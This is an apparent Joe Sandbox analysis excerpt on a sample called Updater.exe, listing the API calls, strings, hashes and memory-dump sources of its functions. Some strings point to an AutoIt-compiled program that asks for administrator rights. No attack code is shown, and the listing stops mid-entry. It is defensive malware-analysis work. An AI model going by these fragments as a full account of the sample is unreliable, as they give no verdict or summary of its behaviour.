                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2962429428-0
                                                                                                  • Opcode ID: 5754352c1021d8f47ea920f4733d3dd1fe91eda4dd8426efa3d5e2925cbdb516
                                                                                                  • Instruction ID: ce22943b2ca2d04441869003673e24008f016a2b7655841954be3682b6754a37
                                                                                                  • Opcode Fuzzy Hash: 5754352c1021d8f47ea920f4733d3dd1fe91eda4dd8426efa3d5e2925cbdb516
                                                                                                  • Instruction Fuzzy Hash: 8201AE71801B59DFCB30AF66D880812FBF9BF503153158A3ED29652931C3B4A989CF80
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 0070D582
                                                                                                    • Part of subcall function 007027F4: RtlFreeHeap.NTDLL(00000000,00000000,?,006DFC79,?,?,006D111E), ref: 0070280A
                                                                                                  • _free.LIBCMT ref: 0070D594
                                                                                                  • _free.LIBCMT ref: 0070D5A6
                                                                                                  • _free.LIBCMT ref: 0070D5B8
                                                                                                  • _free.LIBCMT ref: 0070D5CA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 2929853658-0
                                                                                                  • Opcode ID: 21f5e081538b4b5fe983a45363499d4931e2ab36db77a368af6949be7a02a2f9
                                                                                                  • Instruction ID: 3f84c4a2608d1b6a7c3c8a2ede6731918281d2c75b0e9e9710e9bc6d4b15a053
                                                                                                  • Opcode Fuzzy Hash: 21f5e081538b4b5fe983a45363499d4931e2ab36db77a368af6949be7a02a2f9
                                                                                                  • Instruction Fuzzy Hash: 43F0EC32504204EBC674EB9CE9DAC1677E9AA00724B585A06F508D75C2CA3CFC919B64
                                                                                                  APIs
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00734B7D
                                                                                                  • GetParent.USER32 ref: 00734B84
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00734B91
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00734BA7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LongWindow$Parent
                                                                                                  • String ID:
                                                                                                  • API String ID: 2125864951-0
                                                                                                  • Opcode ID: a75db7c2da43a0e91a6bd3e5b70a9b346eaaa8802539fb2d38f7b26dac3bfaf9
                                                                                                  • Instruction ID: d855a01bd07810053a45848f5b45ba334666b348fddec8eb468ef03e17c8c98d
                                                                                                  • Opcode Fuzzy Hash: a75db7c2da43a0e91a6bd3e5b70a9b346eaaa8802539fb2d38f7b26dac3bfaf9
                                                                                                  • Instruction Fuzzy Hash: 8BE09B72709132A77B15162DAC00F5AE59C5E567B4B220360F821F21E5D75CFC0205FD
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 007020E2
                                                                                                    • Part of subcall function 007027F4: RtlFreeHeap.NTDLL(00000000,00000000,?,006DFC79,?,?,006D111E), ref: 0070280A
                                                                                                  • _free.LIBCMT ref: 007020F4
                                                                                                  • _free.LIBCMT ref: 00702107
                                                                                                  • _free.LIBCMT ref: 00702118
                                                                                                  • _free.LIBCMT ref: 00702129
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 2929853658-0
                                                                                                  • Opcode ID: c4e5ba2bbcd0154ffb77b1c546a7ece54749dcf3fab18850651fcac5c83335e8
                                                                                                  • Instruction ID: f277d1c5ca1626f775209eb4b050d44122c00ffb7e64a89b03026cc0a5a420a9
                                                                                                  • Opcode Fuzzy Hash: c4e5ba2bbcd0154ffb77b1c546a7ece54749dcf3fab18850651fcac5c83335e8
                                                                                                  • Instruction Fuzzy Hash: AAF03072815210DFDB556F28BD4954A37A4BB4A7603459206F614962F7CB3D0903DB88
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$_free
                                                                                                  • String ID: a/p$am/pm
                                                                                                  • API String ID: 3432400110-3206640213
                                                                                                  • Opcode ID: aa0103d2b43da1f6a1807f47566e9dbc8edbb1da9284a182a936486c2163f62b
                                                                                                  • Instruction ID: 7d1e7ed52cf39050c64feadea6e73fd52cd1f6032ad9ae8b378e5201b2da4a11
                                                                                                  • Opcode Fuzzy Hash: aa0103d2b43da1f6a1807f47566e9dbc8edbb1da9284a182a936486c2163f62b
                                                                                                  • Instruction Fuzzy Hash: 45D1043190020ADACB299F68C8957FAB7F1FF05310FA4435AEA55AB2D1D33D9D80DB91
                                                                                                  APIs
                                                                                                    • Part of subcall function 006F0854: EnterCriticalSection.KERNEL32(007A16CC,?,007A3504,?,006D1535,007A3504), ref: 006F085F
                                                                                                    • Part of subcall function 006F0854: LeaveCriticalSection.KERNEL32(007A16CC,?,007A3504,?,006D1535,007A3504), ref: 006F089C
                                                                                                    • Part of subcall function 006F06D4: __onexit.LIBCMT ref: 006F06DA
                                                                                                  • __Init_thread_footer.LIBCMT ref: 00756E08
                                                                                                    • Part of subcall function 006F080A: EnterCriticalSection.KERNEL32(007A16CC,007A3504,?,006D154F,007A3504,0071231A), ref: 006F0814
                                                                                                    • Part of subcall function 006F080A: LeaveCriticalSection.KERNEL32(007A16CC,?,006D154F,007A3504,0071231A), ref: 006F0847
                                                                                                    • Part of subcall function 00744358: LoadStringW.USER32(00000066,?,00000FFF,?), ref: 007443A0
                                                                                                    • Part of subcall function 00744358: LoadStringW.USER32(?,?,00000FFF,?), ref: 007443C6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                  • String ID: X3z$X3z$X3z
                                                                                                  • API String ID: 1072379062-444400031
                                                                                                  • Opcode ID: d01c9d8421a2f3ee41583d32303fc7641c8345301dcadee59fb930806de95d6a
                                                                                                  • Instruction ID: 48452f1a8025ef2ddba701f005c1e685cde6b69719a36962497db273454f4342
                                                                                                  • Opcode Fuzzy Hash: d01c9d8421a2f3ee41583d32303fc7641c8345301dcadee59fb930806de95d6a
                                                                                                  • Instruction Fuzzy Hash: 85C17C71A04109AFCB14DF58D891EFAB7B9FF49310F14806AF9059B291DBB4AD49CB90
                                                                                                  APIs
                                                                                                  • GetThreadLocale.KERNEL32(?,00000000,014A6E5B,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 014A6CC0
                                                                                                    • Part of subcall function 014A6959: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 014A6977
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Locale$InfoThread
                                                                                                  • String ID: eeee$ggg$yyyy
                                                                                                  • API String ID: 4232894706-1253427255
                                                                                                  • Opcode ID: ad0c656f96d76dcde6c662c528d2eeaf5b9787f0bed36b8cfe41d670e13aedaa
                                                                                                  • Instruction ID: dc3fc21214b2ba4570567bcddbef59a1fc6a8d487ccc472af395d6b847cd2f0b
                                                                                                  • Opcode Fuzzy Hash: ad0c656f96d76dcde6c662c528d2eeaf5b9787f0bed36b8cfe41d670e13aedaa
                                                                                                  • Instruction Fuzzy Hash: BB4104357001064BE711AA7EC8906FFBBAAEB74150BEF042BE651C7374DA70ED038692
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\friend\Updater.exe,00000104), ref: 0070158A
                                                                                                  • _free.LIBCMT ref: 00701655
                                                                                                  • _free.LIBCMT ref: 0070165F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _free$FileModuleName
                                                                                                  • String ID: C:\Users\user\AppData\Local\friend\Updater.exe
                                                                                                  • API String ID: 2506810119-1063488248
                                                                                                  • Opcode ID: f2b9b2a3b8eed6e62c459c1dae7e96d7d4eb50cadb1c4ea7554d140413188e0f
                                                                                                  • Instruction ID: 9285a8284362dd0c831926922e8fbb4ab0db8f694ec852d76db21c4a7bdbd0c9
                                                                                                  • Opcode Fuzzy Hash: f2b9b2a3b8eed6e62c459c1dae7e96d7d4eb50cadb1c4ea7554d140413188e0f
                                                                                                  • Instruction Fuzzy Hash: 8631C3B1A00258EFCB21DF99DC89D9FBBFCEBC5310B544266F40597291DA794E41CB50
                                                                                                  APIs
                                                                                                  • GetMenuItemInfoW.USER32(00000004,?,00000000,?), ref: 0073D0A0
                                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 0073D0E6
                                                                                                  • DeleteMenu.USER32(0073CBE8,?,00000000,0073CBE8,00000000,00000000,?,00000000), ref: 0073D12F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                                  • String ID: 0
                                                                                                  • API String ID: 135850232-4108050209
                                                                                                  • Opcode ID: 00d2cb3e5e8565115b9a0723c18453c017d64655f3221df455441031e36d8d6f
                                                                                                  • Instruction ID: 94dfe13517d37537191a9fe5f0fb95022005fa315554a3268a93fa6bf3339c00
                                                                                                  • Opcode Fuzzy Hash: 00d2cb3e5e8565115b9a0723c18453c017d64655f3221df455441031e36d8d6f
                                                                                                  • Instruction Fuzzy Hash: 2541DD70604305DFE730DF28E884B2ABBE9AF85310F05461DF466972D2D738AD04CB66
                                                                                                  APIs
                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0076D938,00000000,?,?,?,?), ref: 00764E70
                                                                                                  • GetWindowLongW.USER32 ref: 00764E8D
                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00764E9D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Window$Long
                                                                                                  • String ID: SysTreeView32
                                                                                                  • API String ID: 847901565-1698111956
                                                                                                  • Opcode ID: 374dadba749a42b5ff3c88d7c5931196e992fc2c70851bfb72228a708e22ed77
                                                                                                  • Instruction ID: 8ad86c25fb1d11161a239b3a3df8c5e4175234cde03a05a1ea1a1ca2adfcf389
                                                                                                  • Opcode Fuzzy Hash: 374dadba749a42b5ff3c88d7c5931196e992fc2c70851bfb72228a708e22ed77
                                                                                                  • Instruction Fuzzy Hash: 54317C31600605AFDB259E78DC45BEA7BA9FB08324F244329FD7A931E0CB79EC518B54
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                  • API String ID: 176396367-2734436370
                                                                                                  • Opcode ID: 70db088fee353531c7437e96beb1c6b82b6731427249d7dd3ba881496740f7af
                                                                                                  • Instruction ID: 1b4810ab3530cc708accd4d90bbc3b58a5d41a97b8664142b5a959efe32123d7
                                                                                                  • Opcode Fuzzy Hash: 70db088fee353531c7437e96beb1c6b82b6731427249d7dd3ba881496740f7af
                                                                                                  • Instruction Fuzzy Hash: B1213732105665BAF221B7289C07FBB73D99F51340F24842DF58587183FBE99D8183AB
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007648F7
                                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0076490B
                                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 0076492F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window
                                                                                                  • String ID: SysMonthCal32
                                                                                                  • API String ID: 2326795674-1439706946
                                                                                                  • Opcode ID: 339fa5d2f3016b8b601f7d56876cdfc9ccaf881f0e5bfbbc26a50242f4e6c244
                                                                                                  • Instruction ID: 26f11c2165edfaca27ffcffa834c1de9773a87427c60228413c6e1a22de142bd
                                                                                                  • Opcode Fuzzy Hash: 339fa5d2f3016b8b601f7d56876cdfc9ccaf881f0e5bfbbc26a50242f4e6c244
                                                                                                  • Instruction Fuzzy Hash: EB219132640219BBDF118E54CC86FEA3B79EF48724F114214FE166B1D0D6B9AC559BA0
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007650D7
                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007650E5
                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007650EC
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                  • String ID: msctls_updown32
                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                  • Opcode ID: 535aa7b660b165159fc40d12c3ec33b029a3cf0edbac57811f8000f22924dd6a
                                                                                                  • Instruction ID: 18ebaa51a8913810a6bcd6339760a004b1ea3f7e5e03b7538df33c156d4ebc7a
                                                                                                  • Opcode Fuzzy Hash: 535aa7b660b165159fc40d12c3ec33b029a3cf0edbac57811f8000f22924dd6a
                                                                                                  • Instruction Fuzzy Hash: B72181B5600609AFDB10DF28CCC1D7737ADEB8A394B144159FA029B291CB75EC02DAA0
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007641D8
                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007641E8
                                                                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0076420E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                  • String ID: Listbox
                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                  • Opcode ID: 71812092700b58c47c8e1ebde67b9a7e225a6809f9eb13bee19448c313fc0c81
                                                                                                  • Instruction ID: bc7798f0d564fc8caf91bb28c9f66210a60902968715b31e0a1b0fdc388b2a0d
                                                                                                  • Opcode Fuzzy Hash: 71812092700b58c47c8e1ebde67b9a7e225a6809f9eb13bee19448c313fc0c81
                                                                                                  • Instruction Fuzzy Hash: F821C272610218BFDF158F54CC85EAB37AEEF9A754F108124F9069B190CA79DC5287A0
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 007455A8
                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 007455FC
                                                                                                  • SetErrorMode.KERNEL32(00000000), ref: 00745670
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                                  • String ID: %lu
                                                                                                  • API String ID: 2507767853-685833217
                                                                                                  • Opcode ID: c0286c7f87a1828033aacc3e6b99cd10e0d557a1c9de73ff153f8c55410a8b10
                                                                                                  • Instruction ID: 6d1deeb09cb36f572c4fe64406bd4fc3a8a2686c33e53fa1894f9b7046d25813
                                                                                                  • Opcode Fuzzy Hash: c0286c7f87a1828033aacc3e6b99cd10e0d557a1c9de73ff153f8c55410a8b10
                                                                                                  • Instruction Fuzzy Hash: EE318170A00208AFDB10DF54C984EAA77F9EF08304F158099F909DB352DB75EE45CB62
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00764C08
                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00764C1D
                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00764C2A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID: msctls_trackbar32
                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                  • Opcode ID: a0392e244d3812ea8b74426389afe98efbd20cde7fd38725ca71daecb1240008
                                                                                                  • Instruction ID: af7576ff582317372859e1860134ccec9d938b1ea5fb3a5a10594ee4466dfdb2
                                                                                                  • Opcode Fuzzy Hash: a0392e244d3812ea8b74426389afe98efbd20cde7fd38725ca71daecb1240008
                                                                                                  • Instruction Fuzzy Hash: A0110671240308BEEF215F79CC06FA73BA9EF85B54F114614FE56E21A0D675DC119B24
                                                                                                  APIs
                                                                                                  • DeleteObject.GDI32(?), ref: 006E5182
                                                                                                  • DestroyWindow.USER32(?,006E3A41,?,?,?,?,?,006E3992,?,?), ref: 006E51DF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DeleteDestroyObjectWindow
